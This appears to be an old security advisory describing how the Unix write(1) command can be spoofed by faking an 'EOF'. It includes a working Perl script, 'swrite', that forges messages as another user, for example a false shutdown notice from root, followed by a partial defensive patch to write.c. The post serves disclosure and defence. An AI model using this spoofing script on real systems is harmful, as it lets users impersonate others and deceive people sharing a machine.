write(1)

[butafuco () MC NET (test)]

Program Effected: write(1)
Impact: Mostly Harmless

        It is trivial to spoof a write from one user to the next locally
        on a system by faking an "EOF".  This ofcourse does not effect
        users who have turned off their write permissions.  It's also
        fairly noticeable by the lack of any beep.

-------------------------------swrite-----------------------------------------
#!/usr/contrib/bin/perl
# (NO C) intellectual property is theft... butafuco () mc net

if(@ARGV < 2) {
        print "\n Usage: swrite target from [tty]\n";
        exit 0;
}

while (<STDIN>){
        chop($line = $_);
        push @to_write, $line;
}

$oopsmessage = "oops... sorry :\)\n";
$wait = 30;
$delay = 2;
chop($host = `hostname`);
$terminal = "console";
if(@ARGV > 2){
        $terminal = $ARGV[2];
}

open(JIM, "|write $ARGV[0]");
select(JIM);
$| =1;
sleep $delay;
print(JIM $oopsmessage);
print(JIM "EOF\n");

sleep $wait;
chop($time = `date +%H:%M`);

print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");
foreach $line (@to_write){
        sleep $delay;
        print (JIM "$line\n");
        }
$| = 0;
close(JIM);
-------------------------------swrite----------------------------------------

        example usage...

        Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \
        user root console


        If your an absolute paranoid, here are the diff's of an incomplete
        patch for write.c.. it's a start anyhow.

281c281,284
<       while (fgets(line, sizeof(line), stdin) != NULL)
---
>       while (fgets(line, sizeof(line), stdin) != NULL){
>               if(!strcmp(line, "EOF\n")){
>                       (void)strcpy(line, "EOF <-- Warning: Not End of File.\n");
>               }
282a286
>       }


        It'll work for "EOF" just not for "EOF " or "EOF  " etc...